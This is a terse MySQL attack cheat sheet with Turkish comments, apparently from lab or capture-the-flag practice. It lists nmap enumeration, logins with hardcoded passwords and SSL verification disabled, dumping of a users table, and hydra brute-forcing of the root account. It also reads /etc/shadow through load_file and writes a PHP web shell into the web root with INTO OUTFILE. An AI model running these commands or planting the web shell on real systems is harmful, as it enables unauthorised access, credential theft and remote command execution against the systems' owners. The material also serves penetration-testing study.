nmap 192.168.1.2 -sV -sC -p3306 --script mysql*
# Connect
mysql -u fiona -p987654321 -h 10.129.232.182 --skip-ssl
# SSL Disable
mysql -h 192.168.1.2 -u root -pPassword123 --ssl-verify-server-cert=FALSE
# Veritabanları
show databases;
# Veritabanı seçer
use users;
# Tabloları listeler
show tables;
# Tablodaki verileri listeler
select * from users;
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.1.3 mysql
Sunucudaki dosyayı okur.
mysql -h 192.168.1.3 -u root
select load_file("/etc/shadow");
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';